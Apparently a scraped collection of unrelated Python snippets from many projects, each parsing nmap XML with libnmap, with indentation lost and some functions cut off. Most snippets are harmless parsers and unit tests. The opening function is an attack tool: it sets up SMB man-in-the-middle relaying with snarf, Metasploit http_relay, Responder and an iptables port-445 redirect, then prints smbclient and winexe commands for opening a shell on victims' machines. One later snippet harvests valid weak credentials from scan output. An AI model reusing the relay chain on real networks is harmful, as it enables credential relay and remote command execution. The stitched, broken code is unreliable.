def main(args):
# Initial var setup
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
home_dir = args.home_dir
iface = args.interface
ip = ifaddresses(iface)[AF_INET][0]['addr']
report = NmapParser.parse_fromfile(args.nmapxml)
# Get Snarf
github_url = 'https://github.com/purpleteam/snarf'
get_git_project(github_url, home_dir)
# Get Nodejs
get_nodejs()
# Start MSF http_relay
msf_pid = start_msf_http_relay(ip, home_dir)
# Get SMB hosts
report = NmapParser.parse_fromfile(args.nmapxml)
get_smb_hosts(report, home_dir)
# Run Snarf
cmd = 'screen -S snarf -dm nodejs {}snarf/snarf.js -f {}smb_hosts.txt {}'.format(home_dir, home_dir, ip)
out, err, snarf_pid = run_cmd(cmd)
# Run Snarf iptables cmd
time.sleep(5) # Give snarf time to startup
cmd = 'iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF'
out, err, iptables_pid = run_cmd(cmd)
# Start Responder
resp_pid = start_responder(iface, home_dir)
# Check that everything ran as it should
# Need pid+1 because screen -Sdm causes a fork and execcve
# forcing the real screen process to become pid+1
pids = [(resp_pid+1, 'Responder'),
(msf_pid+1, 'Metasploit http_relay'),
(snarf_pid+1, 'Snarf')]
confirm(pids)
print '\n[+] Done! Point your browser to http://localhost:4001 and refresh it every few minutes to see MITM\'d SMB connections'
print ' After a connection has expired or you manually expire and choose it it run:'
print ' smbclient -U a%a //127.0.0.1/C$'
print ' If the initiator of the SMB connection has admin rights try:'
print ' winexe -U a%a //127.0.0.1/ cmd.exe'
print '\n[*] Ctrl-C to cleanup'
try:
while 1:
time.sleep(10)
except KeyboardInterrupt:
cleanup(pids, home_dir)
sys.exit()
def get_report(xmlscan):
if not path.exists(xmlscan):
logging.error('No file found!')
return None
# Try to parse TODO: do it in proper way
try:
return NmapParser.parse_fromfile(xmlscan)
except:
logging.warning('Exception during nmap file parsing. Trying to parse it as incomplete...')
try:
return NmapParser.parse_fromfile(xmlscan, incomplete=True)
except:
logging.error('Exception during parsing nmap file as incomplete. Exiting...')
return None
def __init__(self, old_report=None, new_report=None):
self.changed = []
self.added = []
self.removed = []
print old_report
if old_report and new_report:
print "using given old and new_report"
#pass
else:
print "no valid data.. taking dummy files from disk"
old_report = NmapParser.parse_fromfile('nmapui/test/1_hosts.xml')
new_report = NmapParser.parse_fromfile('nmapui/test/1_hosts_diff.xml')
self.do_diff(new_report, old_report)
self.print_diff()
def parse_web_servers(files):
try:
servers = set()
for xml in files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
for service in host.services:
if not service.state == "open":
continue
if service.service == 'http' and service.tunnel != 'ssl':
if service.port == 80:
servers.add("http://{0}".format(host.address))
else:
servers.add("http://{0}:{1}".format(host.address,
service.port))
elif service.service == 'https' or \
(service.tunnel == 'ssl' and
service.service == 'http'):
if service.port == 443:
servers.add("https://{0}".format(host.address))
else:
servers.add("https://{0}:{1}".format(host.address,
service.port))
return sorted(servers)
except Exception as e:
error("Error parsing xml file! %s" % e)
exit()
def test_cpeservice(self):
cpelist = ['cpe:/a:openbsd:openssh:5.9p1','cpe:/o:linux:linux_kernel']
rep = NmapParser.parse_fromfile(self.flist_os['fullscan']['file'])
h1 = rep.hosts.pop()
s = h1.services[0]
self.assertEqual(s.cpelist[0].cpestring, cpelist[0])
self.assertEqual(s.cpelist[1].cpestring, cpelist[1])
def parseNMap(file=None, string=None):
try:
if file: report = NmapParser.parse_fromfile(file)
if string: report = NmapParser.parse_fromstring(string)
except:
exit("Invalid Nmap xml!")
systems = []
for h in report.hosts:
system = {'mac':h.mac, 'ip':h.address, 'status':h.status, 'hostnames': h.hostnames,
'vendor':h.vendor, 'distance':h.distance}
cpeList = []
for c in h.os_match_probabilities():
for x in c.get_cpe():
cpeList.append(x)
cpeList=list(set(cpeList))
if len(cpeList)>0:
system['osDetect']=cpeList
services = []
for s in h.services:
service={'port':s.port, 'banner':s.banner, 'protocol':s.protocol, 'name':s.service,
'state':s.state, 'reason':s.reason}
if s.cpelist:
service['cpe'] = s.cpelist[0].cpestring
services.append(service)
system['services']=services
systems.append(system)
return systems
def nmap_multi_port_syn_ping(self, portlist=(21, 22, 23, 25, 53, 80, 110, 111, 135, 137, 138, 139, 143, 443, 8080)):
nmap_xml_file = self.nmap_xml_file_location + '/' + self.nmap_xml_file_name.format("nmap_multi_port_syn_ping",
self.ip_address.replace(".",
"_"))
if not isinstance(portlist, (tuple, list)):
raise TypeError(u"Portlist must be either a list or tuple integers/port numbers.")
if not all(isinstance(p, int) for p in portlist):
raise TypeError(u"Port numbers must be an integer!")
ports = ','.join(str(p) for p in portlist)
proc = Popen([self.nmap_binary, '-oX', nmap_xml_file, '-sP', '-PS' + ports, self.ip_address],
stdout=PIPE,
stderr=PIPE)
stdout, stderr = proc.communicate()
error = stderr.strip('\n') if stderr else stdout.strip('\n')
if not proc.returncode == 0:
raise OSError(u"Ran into issue running nmap multi port syn scan: {0}".format(error))
if proc.returncode == 0:
nmap_report = NmapParser.parse_fromfile(nmap_xml_file)
remove(nmap_xml_file)
if nmap_report.hosts_up >= 1:
return 0
else:
return 1
else:
return 1
def from_nmap_xml(self, scan_dir=SCAN_DIR): try: while True: while len(glob.glob(scan_dir + "/*.xml")) == 0: print "Waiting for nmap scan files..." time.sleep(30) print "[]-->Processing " + str(len(glob.glob(scan_dir + "/*.xml"))) + " new scans." for scan_file in glob.glob(scan_dir + "/*.xml"): print "[]-->Importing " + scan_file scan_obj = NmapParser.parse_fromfile(scan_file) for host in scan_obj.hosts: self._scan_count += 1 # doc_id is the _index in elasticsearch. it's immutable for the host. doc_id = str(int(IPAddress(host.ipv4))) print " Importing banner : " + str(doc_id) new_entry_model = self._conn.factory_object(self._index, self._documment_type, bm.host) self._create_banner_object(new_entry_model, host) # Cleanup processed scans by moving to the 'archive' subdirectory. if not self._debug_mode: shutil.move(scan_file, scan_dir + "/archive") if self._bulk_mode: bulk_result = self._conn.force_bulk() print "[]-->Flushed : " + str(bulk_result) + " from the bulk." print "[]-->Processed : " + str(self._scan_count) + " scans, and " + str(self._banner_count) + " banners successfully." print "[]-->DONE" except KeyboardInterrupt: self._dispose()
def __parse_nmap_xml_file(self,nmap_xml_file):
'''
parse nmap xml result
'''
try:
from libnmap.parser import NmapParser
except:
print 'Please install python-libnmap first, so you can not import nmap result file!'
print 'You can use : pip install python-libnmap'
exit()
results = []
try:
parser = NmapParser.parse_fromfile(nmap_xml_file)
for host in parser.hosts:
ip = host.ipv4
os = host.os.osmatch()[0] if len(host.os.osmatch())>0 else ''
for s in host.services:
if s.state == 'open':
port = s.port
service = s.service
banner = s.banner
#
results.append({'ip':ip,'os':os,'port':port,'service':service,'banner':banner})
#
except Exception,e:
self.print_result('[-]parse nmap xml file exception:%s'%e)
def test_osclasses_new(self):
oclines = [[[{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Apple', 'osfamily': 'Mac OS X', 'osgen': '10.8.X'},
{'type': 'phone', 'accuracy': 100, 'vendor': 'Apple', 'osfamily': 'iOS', 'osgen': '5.X'},
{'type': 'media device', 'accuracy': 100, 'vendor': 'Apple', 'osfamily': 'iOS', 'osgen': '5.X'}]],
[
[{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '2008'}],
[{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '7'}],
[{'type': 'phone', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': 'Phone'}],
[{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': 'Vista'},
{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '2008'},
{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '7'}],
[{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': 'Vista'},
{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '7'},
{'type': 'general purpose', 'accuracy': 100, 'vendor': 'Microsoft', 'osfamily': 'Windows', 'osgen': '2008'}]]
]
rep = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
hlist = []
hlist.append(rep.hosts.pop())
hlist.append(rep.hosts.pop())
i=0
j=0
k=0
for h in hlist:
for om in h.os.osmatches:
for oc in om.osclasses:
tdict = {'type': oc.type, 'accuracy': oc.accuracy, 'vendor': oc.vendor, 'osfamily': oc.osfamily, 'osgen': oc.osgen}
self.assertEqual(oclines[i][j][k], tdict)
k+=1
j+=1
k=0
j=0
i+=1
def test_fpv5(self):
fpval = 'OS:SCAN(V=5.21%D=5/8%OT=22%CT=1%CU=37884%PV=Y%DS=0%DC=L%G=Y%TM=536BFE32%P=x\nOS:86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=8)SEQ\nOS:(SP=101%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M400CST11NW3%O2=M400CST\nOS:11NW3%O3=M400CNNT11NW3%O4=M400CST11NW3%O5=M400CST11NW3%O6=M400CST11)WIN(\nOS:W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF=Y%T=40%W=8018\nOS:%O=M400CNNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(\nOS:R=Y%DF=Y%T=40%W=8000%S=O%A=S+%F=AS%O=M400CST11NW3%RD=0%Q=)T4(R=Y%DF=Y%T=\nOS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0\nOS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G\nOS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n'
fparray = ['OS:SCAN(V=5.21%D=5/8%OT=22%CT=1%CU=37884%PV=Y%DS=0%DC=L%G=Y%TM=536BFE32%P=x\nOS:86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=8)SEQ\nOS:(SP=101%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8)OPS(O1=M400CST11NW3%O2=M400CST\nOS:11NW3%O3=M400CNNT11NW3%O4=M400CST11NW3%O5=M400CST11NW3%O6=M400CST11)WIN(\nOS:W1=8000%W2=8000%W3=8000%W4=8000%W5=8000%W6=8000)ECN(R=Y%DF=Y%T=40%W=8018\nOS:%O=M400CNNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(\nOS:R=Y%DF=Y%T=40%W=8000%S=O%A=S+%F=AS%O=M400CST11NW3%RD=0%Q=)T4(R=Y%DF=Y%T=\nOS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0\nOS:%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z\nOS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G\nOS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n']
rep = NmapParser.parse_fromfile(self.flist_os['nv5']['file'])
h1 = rep.hosts[4]
self.assertEqual(h1.os.fingerprint, fpval)
self.assertEqual(h1.os.fingerprints, fparray)
def parseNMap(file=None, string=None):
try:
if file: report = NmapParser.parse_fromfile(file)
elif string: report = NmapParser.parse_fromstring(string)
else: raise(Exception)
except:
raise(Exception)
systems = []
for h in report.hosts:
system = {'mac':h.mac, 'ip':h.address, 'status':h.status, 'hostnames': h.hostnames,
'vendor':h.vendor, 'distance':h.distance}
cpeList = []
for c in h.os_match_probabilities():
for x in c.get_cpe():
cpeList.append(x)
cpeList=list(set(cpeList))
if len(cpeList)>0:
system['cpes']=cpeList
services = []
for s in h.services:
service={'port':s.port, 'banner':s.banner, 'protocol':s.protocol, 'name':s.service,
'state':s.state, 'reason':s.reason}
if s.cpelist:
service['cpe'] = s.cpelist[0].cpestring
services.append(service)
system['services']=services
systems.append(system)
scan={"systems":systems, "scan": {"time": report.endtime,
"type": report._nmaprun["args"]}}
return scan
def test_fpv6(self):
fpval = "OS:SCAN(V=6.40-2%E=4%D=5/9%OT=88%CT=%CU=%PV=Y%DS=0%DC=L%G=N%TM=536BFF2F%P=x\nOS:86_64-apple-darwin10.8.0)SEQ(SP=F9%GCD=1%ISR=103%TI=RD%TS=A)OPS(O1=M3FD8\nOS:NW4NNT11SLL%O2=M3FD8NW4NNT11SLL%O3=M3FD8NW4NNT11%O4=M3FD8NW4NNT11SLL%O5=\nOS:M3FD8NW4NNT11SLL%O6=M3FD8NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5\nOS:=FFFF%W6=FFFF)ECN(R=Y%DF=Y%TG=40%W=FFFF%O=M3FD8NW4SLL%CC=N%Q=)T1(R=Y%DF=\nOS:Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=\nOS:Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N)\n"
fparray = ['OS:SCAN(V=6.40-2%E=4%D=5/9%OT=88%CT=%CU=%PV=Y%DS=0%DC=L%G=N%TM=536BFF2F%P=x\nOS:86_64-apple-darwin10.8.0)SEQ(SP=F9%GCD=1%ISR=103%TI=RD%TS=A)OPS(O1=M3FD8\nOS:NW4NNT11SLL%O2=M3FD8NW4NNT11SLL%O3=M3FD8NW4NNT11%O4=M3FD8NW4NNT11SLL%O5=\nOS:M3FD8NW4NNT11SLL%O6=M3FD8NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5\nOS:=FFFF%W6=FFFF)ECN(R=Y%DF=Y%TG=40%W=FFFF%O=M3FD8NW4SLL%CC=N%Q=)T1(R=Y%DF=\nOS:Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=\nOS:Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N)\n']
rep = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
h1 = rep.hosts.pop()
self.assertEqual(h1.os.fingerprint, fpval)
self.assertEqual(h1.os.fingerprints, fparray)
def get_SMB_hosts(args):
if args.nmapxml:
report = NmapParser.parse_fromfile(args.nmapxml)
hostfile = create_smb_hostfile(report, args.home_dir)
elif args.list_ips:
hostfile = args.list_ips
return hostfile
def Parse(filename, output):
nmap_report = NmapParser.parse_fromfile(filename)
print "Nmap scan summary: {0}".format(nmap_report.summary)
output.write("TCP\n")
output.write("Machine,Open,Filtered,Closed,OS detection guess,ICMP response\n")
for host in nmap_report.hosts:
port_tcp_open=0
port_tcp_closed=0
output.write(str(host.address)+",")
for port in host.get_ports():
a,b = port
if host.get_service(a,b).open():
port_tcp_open+=1
else:
port_tcp_closed+=1
port_tcp_filtered = int(str(host.extraports_state['count']).split(":")[1].split("'")[1])
output.write(str(port_tcp_open)+","+str(port_tcp_filtered)+","+str(port_tcp_closed)+",")
if host.os_fingerprinted:
for a in host.os_match_probabilities():
c = str(a).split(":")
output.write(c[0].strip("\r\n") + "("+c[1].split(" ")[1].strip("\r\n")+"%) / ")
output.write(",")
else:
output.write("Unknown,")
output.write(host.status)
output.write("\r\n")
def worker(self, targets, options):
print(targets)
print(options)
result = {
"start_time": datetime.utcnow(),
"end_time": datetime.utcnow(),
"result": {
"total": len(targets.split()),
"failed": 0,
"details": []
}
}
count = 0
temp_file = "{}.log".format(str(uuid.uuid1()))
scan_cmd = "nmap {} -oX {} {}".format(options, temp_file, targets)
call(scan_cmd, shell=True)
item = {}
try:
parser_result = NmapParser.parse_fromfile(temp_file)
item["start_time"] = parser_result.started
item["end_time"] = parser_result.endtime
item["elasped"] = parser_result.elapsed
item["commandline"] = parser_result.commandline
item["error"] = ""
item["hosts"] = []
for host in parser_result.hosts:
host_item = {
"address": host.address,
"status": host.status,
"vendor": host.vendor,
"services": [],
}
for service in host.services:
service_item = {
"port": service.port,
"tunnel": service.tunnel,
"protocol": service.protocol,
"state": service.state,
"service": service.service,
"banner": service.banner,
}
host_item["services"].append(service_item)
item["hosts"].append(host_item)
if os.path.exists(temp_file):
os.remove(temp_file)
except Exception as e:
print(e)
item["error"] = e.__repr__()
result["result"]["failed"] += 1
result["result"]["details"].append(item)
count += 1
result["end_time"] = datetime.utcnow()
return result
def execute(db,filename):
print "Loading %s into database..." % filename
rpt = NmapParser.parse_fromfile(filename)
sid = save_report_header(db,rpt)
save_hosts(db, sid, rpt.hosts)
print "File loaded."
def test_os_class_probabilities(self):
p = NmapParser.parse_fromfile(self.fos_class_probabilities)
h = p.hosts.pop()
osc = h.os_class_probabilities().pop()
self.assertEqual(osc.type, "general purpose")
self.assertEqual(osc.vendor, "Linux")
self.assertEqual(osc.osfamily, "Linux")
self.assertEqual(osc.osgen, "3.X")
self.assertEqual(osc.accuracy, 100)
def test_fp(self):
for file_e in self.flist_full:
rep = NmapParser.parse_fromfile(file_e["file"])
for _host in rep.hosts:
if file_e["os"] != 0:
self.assertTrue(_host.os_fingerprinted)
elif file_e["os"] == 0:
self.assertFalse(_host.os_fingerprinted)
else:
raise Exception
def parseNmap(filename):
ipList=[]
httpList=[]
httpsList=[]
portList=[]
portsList=[]
stateList=[]
serviceList=[]
with open (filename, 'rt') as file:
tree=ElementTree.parse(file)
rep = NmapParser.parse_fromfile(filename)
for _host in rep.hosts:
ip = (_host.address)
for services in _host.services:
if services.state=="open":
if services.service=="http":
httpList.append([str(ip),str(services.port)])
elif services.service=="https":
httpsList.append([str(ip),str(services.port)])
else:
portsList.append([str(ip),str(services.port)])
if findWeb==True:
if len(httpList)>0:
for x in httpList:
url = "http://"+x[0]+":"+x[1]
#if isUp(x[0])==False:
# print "[!] The IP address is not pingable. Please verify if the host is up"
# sys.exit()
#print "\nTesting: "+url
scheme = "http"
hostNo = x[0]
portNo = x[1]
if testFakeURI(scheme,hostNo,portNo)==False:
print "- Testing: "+hostNo+":"+str(portNo)
testURI(scheme,hostNo,portNo)
else:
print "- Web server return status code 200 for all URLs. Please use the -detect argument for advanced detection"
if findWeb==True:
if len(httpsList)>0:
for x in httpsList:
url = "https://"+x[0]+":"+x[1]
#print "\nTesting: "+url
scheme = "https"
hostNo = x[0]
portNo = x[1]
if testFakeURI(scheme,hostNo,portNo)==False:
testURI(scheme,hostNo,portNo)
else:
print "- Web server return status code 200 for all URLs. Please use the -detect argument for advanced detection"
if findPort==True:
if len(portsList)>0:
for x in portsList:
lookupPort(x[0],x[1])
def test_diff_host_list(self):
fdir = os.path.dirname(os.path.realpath(__file__))
r1 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml'))
r2 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/2_hosts.xml'))
r3 = NmapParser.parse_fromfile("%s/%s" % (fdir, 'files/1_hosts.xml'))
r4 = NmapParser.parse_fromfile("%s/%s" % (fdir,
'files/2_hosts_achange.xml'))
d1 = r1.diff(r2)
self.assertEqual(d1.changed(), set(['hosts_total', 'commandline',
'hosts_up', 'scan_type',
'elapsed']))
self.assertEqual(d1.unchanged(), set(['hosts_down', 'version',
'NmapHost::127.0.0.1']))
self.assertEqual(d1.removed(), set(['NmapHost::74.207.244.221']))
d2 = r1.diff(r3)
self.assertEqual(d2.changed(), set([]))
self.assertEqual(d2.unchanged(), set(['hosts_total',
'commandline',
'hosts_up',
'NmapHost::127.0.0.1',
'elapsed',
'version',
'scan_type',
'hosts_down']))
self.assertEqual(d2.added(), set([]))
self.assertEqual(d2.removed(), set([]))
d3 = r2.diff(r4)
self.assertEqual(d3.changed(), set(['NmapHost::127.0.0.1']))
self.assertEqual(d3.unchanged(), set(['hosts_total',
'commandline',
'hosts_up',
'NmapHost::74.207.244.221',
'version',
'elapsed',
'scan_type',
'hosts_down']))
self.assertEqual(d3.added(), set([]))
self.assertEqual(d3.removed(), set([]))
def test_osmatches_old(self):
rep = NmapParser.parse_fromfile(self.flist_os['nv5']['file'])
h1 = rep.hosts[4]
h1osmatches = [{'line': -1, 'accuracy': 95, 'name': 'general purpose:Linux:Linux'},
{'line': -1, 'accuracy': 90, 'name': 'WAP:Gemtek:embedded'},
{'line': -1, 'accuracy': 89, 'name': 'general purpose:Nokia:Linux'},
{'line': -1, 'accuracy': 88, 'name': 'webcam:AXIS:Linux'}]
j=0
for om in h1.os.osmatches:
tdict = {'line': om.line, 'accuracy': om.accuracy, 'name': om.name}
self.assertEqual(h1osmatches[j], tdict)
j+=1
def diff_reports(self, first_rep=-1, second_rep=-2, fresh_scan=False, test_for_debug=False):
'''
Launcher for nmap_diff.
:param first_rep: first report from DB
:param second_rep: second report from DB
:param fresh_scan: if we want to do a new scan before diff
:param test_for_debug: just see how diff works with good XML NMAP reports
:return:
'''
if test_for_debug:
print('#################TEST_FOR_DEBUG#########################')
newrep = NmapParser.parse_fromfile('C:\\Python34\\Lib\\site-packages\\libnmap\\test\\files\\2_hosts_achange.xml')
oldrep = NmapParser.parse_fromfile('C:\\Python34\\Lib\\site-packages\\libnmap\\test\\files\\1_hosts.xml')
self.print_diff(newrep, oldrep)
else:
nm = NmapWrapper()
if fresh_scan:
nm.launch()
all_reports = nm.get_all_reports()
rep1 = all_reports[first_rep][1]
rep2 = all_reports[second_rep][1]
self.print_diff(rep1, rep2)
self.write_to_db(self.diff)
def parse_weak_pass_file(path, stat):
result_lst = []
try:
report = NmapParser.parse_fromfile( path )
for host in report.hosts:
for svc in host.services:
for script in svc.scripts_results:
output = script.get('output')
if output and ('Valid credentials' in output or 'Login Success' in output):
stat.host_weak = stat.host_weak + 1
stat.weak_list.append( '\n{}:{}{}'.format(host.address, svc.port, output) )
result_lst.append( weak_pass_node(stat.host_weak, host.address, host.address, svc.service, svc.port, svc.protocol, script.get('id'), script.get('output')) )
except Exception as e:
logging.error( 'Error in parse_weak_pass_file\n' + traceback.format_exc() )
return result_lst
def parse_xml(filepath):
'''Parses an XML file and finds information about the hosts and returns the scan object'''
try:
nmap_report = NmapParser.parse_fromfile(filepath)
except TypeError:
print "[!] IOError : Cannot read from the file. Try again."
return 0
sys.exit()
except NmapParserException:
print "[!] Bad XML file. The scan was probably interrupted."
return 0
_stats(nmap_report)
return nmap_report
def parse_unique_services(files):
try:
services = set()
for xml in files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
for service in host.services:
display = service.service
if service.tunnel:
display = service.tunnel + "/" + display
if service.state == "open":
services.add(display)
return sorted(services)
except Exception as e:
error("Error parsing xml file! %s" % e)
exit()
def parse_hosts(files, check_ports=False):
try:
hosts = set()
for xml in files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
if host.is_up():
if not check_ports:
hosts.add(host.address)
else:
if len(host.get_open_ports()) > 0:
hosts.add(host.address)
return sorted(hosts)
except Exception as e:
error("Error parsing xml file! %s" % e)
exit()
def parse_ports_for_address(files, address):
try:
ports = set()
for xml in files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
if not address == host.address:
continue
for service in host.services:
if service.state == "open":
ports.add(str(service.port) + "/" +
str(service.protocol))
return sorted(ports)
except Exception as e:
error("Error parsing xml file! %s" % e)
exit()
def parse_service(files, regex):
try:
hosts = set()
for xml in files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
for service in host.services:
display = service.service
if not display:
display = 'unknown'
if service.tunnel:
display = service.tunnel + "/" + display
if service.state == "open":
if re.search("^" + regex + "$", display, re.IGNORECASE):
hosts.add(host.address + ":" + str(service.port))
return sorted(hosts)
except Exception as e:
error("Error parsing xml file! %s" % e)
exit()
def urls_from_nmap_xml(nmap_file):
if not path.exists(nmap_file):
return
report = NmapParser.parse_fromfile(nmap_file)
urls = []
for host in report.hosts:
#Skip hosts with errors
if host.address.find(':') != -1:
continue
if len(host.hostnames):
tmp_host = host.hostnames.pop()
else:
tmp_host = host.address
# print("Nmap scan report for {0} ({1})".format(tmp_host, host.address))
# print("Host is {0}.".format(host.status))
# print(" PORT STATE SERVICE")
for serv in host.services:
# pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format(
# str(serv.port),
# serv.protocol,
# serv.state,
# serv.service)
# if len(serv.banner):
# pserv += " ({0})".format(serv.banner)
#print(pserv)
svc = serv.service.lower()
if serv.state == 'open' and svc.find('http') != -1:
if svc.find('ssl'):
proto = 'https'
else:
proto = 'http'
urls.append('%s://%s:%i/' % (proto, host.address, serv.port))
if tmp_host != host.address:
urls.append('%s://%s:%i/' % (proto, tmp_host, serv.port))
return urls
from pprint import pprint
from libnmap.parser import NmapParser
report = NmapParser.parse_fromfile('./out.xml2')
for host in report.hosts:
print host.hostnames[0] + ':',
ports = []
for port in host.get_open_ports():
ports.append(str(port[0]))
print(','.join(ports))
def test_osclasses_new(self):
oclines = [
[[
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Apple",
"osfamily": "Mac OS X",
"osgen": "10.8.X",
},
{
"type": "phone",
"accuracy": 100,
"vendor": "Apple",
"osfamily": "iOS",
"osgen": "5.X",
},
{
"type": "media device",
"accuracy": 100,
"vendor": "Apple",
"osfamily": "iOS",
"osgen": "5.X",
},
]],
[
[{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "2008",
}],
[{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "7",
}],
[{
"type": "phone",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "Phone",
}],
[
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "Vista",
},
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "2008",
},
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "7",
},
],
[
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "Vista",
},
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "7",
},
{
"type": "general purpose",
"accuracy": 100,
"vendor": "Microsoft",
"osfamily": "Windows",
"osgen": "2008",
},
],
],
]
rep = NmapParser.parse_fromfile(self.flist_os["nv6"]["file"])
hlist = []
hlist.append(rep.hosts.pop())
hlist.append(rep.hosts.pop())
i = 0
j = 0
k = 0
for h in hlist:
for om in h.os.osmatches:
for oc in om.osclasses:
tdict = {
"type": oc.type,
"accuracy": oc.accuracy,
"vendor": oc.vendor,
"osfamily": oc.osfamily,
"osgen": oc.osgen,
}
self.assertEqual(oclines[i][j][k], tdict)
k += 1
j += 1
k = 0
j = 0
i += 1
def outproc(xml_val=''):
if xml_val != '': # This condition will execute when data is comming from a scan
try:
nmap_report = NmapParser.parse(xml_val)
except ValueError:
print(xml_val)
print(
"\n The program was not able to process the output properly... \n"
)
exit(0)
except libnmap.parser.NmapParserException:
print(
"Something went wrong with the scan and a proper XML report was not generated \n"
)
restore = input(
"We can try to restore the xml output \n Please enter the path where you would like to save the XML file: \n >"
)
if restore == '':
tkwindow = tkinter.Tk()
tkwindow.withdraw() # Used to Hide the tkinter window.
while True:
try:
filename = filedialog.asksaveasfile(
initialdir="/",
title="Save Your File",
filetypes=(("XML Files", "*.xml"), ("All Files",
"*.*")))
nmap_report = NmapParser.parse_fromfile(filename)
except ValueError:
print(
"An error was detected. Was the selected file correct? \n"
)
else:
print("XML File Selected: ", restore)
break
tsummary = "Nmap scan summary: {0} \n".format(nmap_report.summary)
hsummary = "Nmap Scan discovered {0}/{1} hosts up".format(
nmap_report.hosts_up, nmap_report.hosts_total)
final_data = {}
for _host in nmap_report.hosts: # Loop through all the hosts in XML
if _host.is_up(): # Check to filter only up hosts
# print("\n" + "Host: {0} {1}".format(_host.address, " ".join(_host.hostnames)))
ports = {}
for s in _host.services: # Loop through all the Ports, Services and State of the current host
if s.state == 'open': # Check to filter only open ports.
current_port = {
s.port: {
"protocol": s.protocol,
"service": s.service,
"state": s.state
}
}
ports.update(current_port)
h_data = {_host.address: ports}
final_data.update(h_data)
return final_data
# This will execute when scan was not run and XML file was given directly as an input data
else:
outfile = input(
"Enter Path to XML File (Press Enter Key To Browse Your PC): ")
if outfile == '':
tkwindow = tkinter.Tk()
tkwindow.withdraw() # Used to Hide the tkinter window.
while True:
try:
filename = filedialog.askopenfilename(
initialdir="/",
title="Select Your File",
filetypes=(("XML Files", "*.xml"), ("All Files",
"*.*")))
nmap_report = NmapParser.parse_fromfile(filename)
except ValueError:
print(
"An error was detected. Was the selected file correct? \n"
)
else:
print("XML File Selected: ", outfile)
break
else:
try:
nmap_report = NmapParser.parse_fromfile(outfile)
print("XML File Selected: ", outfile)
except ValueError:
print(
"An error was detected. Was the selected file correct? \n")
redo = outproc()
tsummary = "Nmap scan summary: {0} \n".format(nmap_report.summary)
